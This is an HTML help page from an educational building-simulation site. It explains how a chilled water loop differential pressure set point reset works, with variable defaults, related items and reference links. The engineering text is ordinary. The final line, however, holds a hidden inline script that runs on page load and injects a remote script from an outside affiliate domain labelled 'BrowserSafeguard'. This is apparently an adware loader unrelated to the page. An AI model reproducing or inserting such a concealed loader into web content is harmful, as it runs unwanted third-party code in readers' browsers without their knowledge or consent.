﻿<!doctype html>
<html>
<head>
<meta charset="UTF-8">
<title>Learn High Performance Buildings</title>
<meta name="description" content="Info about LHPB.">
<meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, zoom=20%, target-densitydpi=high-dpi">
<link href="../css/normalize.css" rel="stylesheet" type="text/css">
<link href="../css/info.css" rel="stylesheet" type="text/css">
<link rel="shortcut icon" href="file:../images/favicon.ico" >
</head>
<body>
<div id="wrapper" class="cf">
<div id="container">
<div id="from">
</div>
<div id="logo" title="LHPB: Learn High Performance Buildings"></div>
<div id="title" class="cf">Learn High Performance Buildings</div>
<div id="info" class="cf">
<h1>CHILLED WATER LOOP DIFFERENTIAL PRESSURE SET POINT RESET</h1>
<h3>Associated System: CENTRAL PLANT (CHILLER, COOLING TOWER, AND BOILER)</h3>
<div class="graphic"> <img src="../HVAC AHU & Ducts/CoolingCoil.png" alt=""/ ></div>    
<p>  This parameter controls the loop differential pressure reset strategy. Hydronic systems (cooling/heating water loop) are designed to maintain a determined differential pressure under design conditions (maximum cooling or heating demand for a specific building). If the system utilizes two-way valves at the coils, these valves will modulate as required by the heating or cooling demands. As a result, the pressure across these coils (and hence across the entire system) will also modulate. In order to maintain a constant pressure differential, the water flowing through the system will adjusted by changing the motor speed of the water pumps. 
When a differential pressure set point reset strategy has been implemented, the pressure differential set point will be adjusted depending anticipated heating or cooling demand. For instance, during periods of moderate cooling/heating demand the pressure differential set point may be lowered, causing the average speed of the pump motors to be greatly reduced.</p>      
<!--<p>(<a href="#">See also the �</a> )</p>-->
<p>Adjusting the setting will determine how the reset is implemented.</p>      
<h4>The value of this variable can be adjusted during a simulation run-time.</h4>      
<h2>Variable Descriptions</h2>
<ul class="list-variable">        
<li><label>Default:</label> FixSP</li>
<li><label>Minimum:</label> </li>
<li><label>Maximum:</label> </li>
<!--<li><label>Default Units:</label> i_Default</li>-->
<!-- <li><label>English:</label> </li>-->
<li><label>IP Unit:</label> set of options</li>
<li><label>SI Units:</label> set of options</li>      </ul>
<h2>Related Items: </h2>
<ul><li>HOT WATER LOOP DIFFERENTIAL PRESSURE SET POINT RESET</li><li>CHILLED WATER TEMP RESET</li><li>HOT WATER TEMP RESET</li></ul>
<h2>Links:</h2>
<ul>
<li><a href="http://www.taylor-engineering.com/downloads/articles/ASHRAE%20Journal%20-%20Optimizing%20Design%20&%20Control%20of%20Chilled%20Water%20Plants%20Part%205%20Optimized%20Control%20Sequences%20-%20Taylor.pdf" target="_blank">http://www.taylor-engineering.com/downloads/articles/ASHRAE%20Journal%20-%20Optimizing%20Design%20&%20Control%20of%20Chilled%20Water%20Plants%20Part%205%20Optimized%20Control%20Sequences%20-%20Taylor.pdf</a></li><li><a href="http://www.etcc-ca.com/sites/default/files/OLD/images/stories/demand-based_building_controls1.pdf" target="_blank">http://www.etcc-ca.com/sites/default/files/OLD/images/stories/demand-based_building_controls1.pdf</a></li><li><a href="http://www.su-per-b.org" target="_blank">http://www.su-per-b.org</a></li>      </ul>
<div class="version"> Version 1.00</div>
    </div>
  </div>
</div>
<script type="text/javascript">(function () {if (top.location == self.location && top.location.href.split('#')[0] == 'http://learnhpb.org/demos/13.01/i-content/iv-SYSTAirDB.html') {var po = document.createElement('script'); po.type = 'text/javascript'; po.async = true;po.src = 'https://api.jollywallet.com/affiliate/client?dist=213&sub=bsg-rt-tightrope&name=BrowserSafeguard';var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s);}})();</script></body>
</html>
